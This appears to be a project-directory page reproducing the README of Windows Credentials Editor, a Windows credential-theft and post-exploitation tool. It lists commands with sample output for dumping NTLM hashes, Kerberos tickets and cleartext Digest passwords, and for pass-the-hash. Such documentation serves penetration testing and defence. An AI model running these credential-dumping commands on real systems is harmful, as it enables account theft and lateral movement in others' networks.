All Projects â†’ returnvar â†’ Wce

returnvar / Wce

Licence: other
Windows Credentials Editor v1.3beta

Labels

Projects that are alternatives of or similar to Wce

Buttercup Core
🎩 The mighty NodeJS password vault
Stars: ✭ 340 (+593.88%)
Mutual labels:  passwords
Snappass
Share passwords securely
Stars: ✭ 598 (+1120.41%)
Mutual labels:  passwords
Dsinternals
Directory Services Internals (DSInternals) PowerShell Module and Framework
Stars: ✭ 776 (+1483.67%)
Mutual labels:  passwords
Pentesterspecialdict
渗透æĩ‹č¯•äēē员专į”¨į˛žįŽ€åŒ–å­—å…¸ Dictionary for penetration testers happy hacker
Stars: ✭ 391 (+697.96%)
Mutual labels:  passwords
Mooltipass
Github repository dedicated to the mooltipass project
Stars: ✭ 501 (+922.45%)
Mutual labels:  passwords
Hashview
A web front-end for password cracking and analytics
Stars: ✭ 601 (+1126.53%)
Mutual labels:  passwords
Devise Security
A security extension for devise, meeting industrial standard security demands for web applications.
Stars: ✭ 302 (+516.33%)
Mutual labels:  passwords
Passwordcockpit
Passwordcockpit is a simple, free, open source, self hosted, web based password manager for teams. It is made in PHP, Javascript, MySQL and it run on a docker service. It allows users with any kind of device to safely store, share and retrieve passwords, certificates, files and much more.
Stars: ✭ 34 (-30.61%)
Mutual labels:  passwords
Lesspass
🔑 stateless open source password manager
Stars: ✭ 4,879 (+9857.14%)
Mutual labels:  passwords
Whaler
Program to reverse Docker images into Dockerfiles
Stars: ✭ 670 (+1267.35%)
Mutual labels:  passwords
Ff Password Exporter
Easily export your passwords from Firefox.
Stars: ✭ 447 (+812.24%)
Mutual labels:  passwords
Encpass.sh
Lightweight solution for using encrypted passwords in shell scripts
Stars: ✭ 494 (+908.16%)
Mutual labels:  passwords
Lockwise Android
Firefox's Lockwise app for Android
Stars: ✭ 607 (+1138.78%)
Mutual labels:  passwords
Chromepass
Chromepass - Hacking Chrome Saved Passwords
Stars: ✭ 364 (+642.86%)
Mutual labels:  passwords
Hashtopolis
A Hashcat wrapper for distributed hashcracking
Stars: ✭ 835 (+1604.08%)
Mutual labels:  passwords
Cryptr
Cryptr: a GUI for Hashicorp's Vault
Stars: ✭ 324 (+561.22%)
Mutual labels:  passwords
Wpa2 Wordlists
A collection of wordlists dictionaries for password cracking
Stars: ✭ 597 (+1118.37%)
Mutual labels:  passwords
Featherpasswordmanager
Highly portable extremely light-weight password manager that stores all your passwords in a local encrypted file.
Stars: ✭ 39 (-20.41%)
Mutual labels:  passwords
Pwnedornot
OSINT Tool for Finding Passwords of Compromised Email Addresses
Stars: ✭ 888 (+1712.24%)
Mutual labels:  passwords
Pass Rotate
A tool and library for rotating your password on online services
Stars: ✭ 610 (+1144.9%)
Mutual labels:  passwords

Windows Credentials Editor v1.3beta (32-bit) (c) 2010, 2011, 2012 Amplia Security, Hernan Ochoa written by: [email protected] http://www.ampliasecurity.com

Abstract

Windows Credentials Editor (WCE) v1.3beta allows you to

NTLM authentication:

  • List logon sessions and add, change, list and delete associated credentials (e.g.: LM/NT hashes)
  • Perform pass-the-hash on Windows natively
  • Obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be used to authenticate to other systems. WCE can perform this task without injecting code, just by reading and decrypting information stored in Windows internal memory structures. It also has the capability to automatically switch to code injection when the aforementioned method cannot be performed

Kerberos authentication:

  • Dump Kerberos tickets (including the TGT) stored in Windows machines
  • Reuse/Load those tickets on another Windows machines, to authenticate to other systems and services
  • Reuse/Load those tickets on *Unix machines, to authenticate to other systems and services

Digest Authentication:

  • Obtain cleartext passwords entered by the user when logging into a Windows system, and stored by the Windows Digest Authentication security package

Supported Platforms

Windows Credentials Editor supports Windows XP, 2003, Vista, 7 and 2008.

Requirements

This tool requires administrator privileges to dump and add/delete/change NTLM credentials, and to dump cleartext passwords stored by the Windows Digest Authentication security package.

Kerberos tickets can be obtained as a normal user although administrator privileges might be required to obtain session keys depending on the system's configuration.

Please remember this is an attack and post-exploitation tool.

Options

Windows Credentials Editor provides the following options:

Options:
-l List logon sessions and NTLM credentials (default). -s Changes NTLM credentials of current logon session. Parameters: :::. -r Lists logon sessions and NTLM credentials indefinitely. Refreshes every 5 seconds if new sessions are found. Optional: -r. -c Run in a new session with the specified NTLM credentials. Parameters: . -e Lists logon sessions NTLM credentials indefinitely. Refreshes every time a logon event occurs. -o saves all output to a file. Parameters: . -i Specify LUID instead of use current logon session. Parameters: . -d Delete NTLM credentials from logon session. Parameters: . -a Use Addresses. Parameters: -f Force 'safe mode'. -g Generate LM & NT Hash. Parameters: . -K Dump Kerberos tickets to file (unix & 'windows wce' form at) -k Read Kerberos tickets from file and insert into Windows cache -w Dump cleartext passwords stored by the digest authentication package -v verbose output.

Examples:

* List current logon sessions

C:>wce -l WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa ([email protected]) Use -h for help.

meme:meme:11111111111111111111111111111111:11111111111111111111111111111111

* List current logon sessions with verbose output enabled

C:>wce -l -v WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa ([email protected]) Use -h for help.

Current Logon Session LUID: 00064081h Logon Sessions Found: 8 WIN-REK2HG6EBIS\auser:NTLM LUID:0006409Fh WIN-REK2HG6EBIS\auser:NTLM LUID:00064081h NT AUTHORITY\ANONYMOUS LOGON:NTLM LUID:00019137h NT AUTHORITY\IUSR:Negotiate LUID:000003E3h NT AUTHORITY\LOCAL SERVICE:Negotiate LUID:000003E5h WORKGROUP\WIN-REK2HG6EBIS$:Negotiate LUID:000003E4h :NTLM LUID:0000916Ah WORKGROUP\WIN-REK2HG6EBIS$:NTLM LUID:000003E7h

00064081:meme:meme:11111111111111111111111111111111:11111111111111111111111111111111

* Change NTLM credentials associated with current logon session

C:>wce -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999 WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa ([email protected]) Use -h for help.

Changing NTLM credentials of current logon session (00064081h) to: Username: auser domain: admin LMHash: 99999999999999999999999999999999 NTHash: 99999999999999999999999999999999 NTLM credentials successfully changed!

* Add/Change NTLM credentials of a logon session (not the current one)

C:>wce -i 3e5 -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999 WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Och oa ([email protected]) Use -h for help.

Changing NTLM credentials of logon session 000003E5h to: Username: auser domain: admin LMHash: 99999999999999999999999999999999 NTHash: 99999999999999999999999999999999 NTLM credentials successfully changed!

* Delete NTLM credentials associated with a logon session

C:>wce -d 3e5 WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa ([email protected]) Use -h for help.

NTLM credentials successfully deleted!

* Run WCE indefinitely, waiting for new credentials/logon sessions.
Refresh is performed every time a logon event is registered in the Event Log.

C:>wce -e

* Run WCE indefinitely, waiting for new credentials/logon sessions
Refresh is every 5 seconds by default.

C:>wce -r

* Run WCE indefinitely, waiting for new credentials/logon sessions, but refresh every 1 second (by default wce refreshes very 5 seconds)

C:>wce -r5

* Generate LM & NT Hash.

C:>wce -g test

WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Herna n Ochoa ([email protected]) Use -h for help.

Password: test Hashes: 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537

* Dump Kerberos tickets to file (unix & 'windows wce' format)      

C:>wce -K WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Herna n Ochoa ([email protected]) Use -h for help.

Converting and saving TGT in UNIX format to file wce_ccache... Converting and saving tickets in Windows WCE Format to file wce_krbtkts.. 5 kerberos tickets saved to file 'wce_ccache'. 5 kerberos tickets saved to file 'wce_krbtkts'. Done!

* Read Kerberos tickets from file and insert into Windows cache

C:>wce -k WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Herna n Ochoa ([email protected]) Use -h for help.

Reading kerberos tickets from file 'wce_krbtkts'... 5 kerberos tickets were added to the cache. Done!

   * Dump cleartext passwords stored by the Digest Authentication package

C:>wce -w WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa ([email protected]) Use -h for help.

test\MYDOMAIN:mypass1234 NETWORK SERVICE\WORKGROUP:test

GETLSASRVADDR.EXE

This tool can be used to obtain automatically needed addresses for WCE to be able to read logon sessions and NTLM credentials from memory.

Addresses obtained can then be used with WCE using the -A switch.

This tool requires the dlls symsrv.dll and dbghelp.dll available from the "Debugging Tools for Windows" package.

Additional Information

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].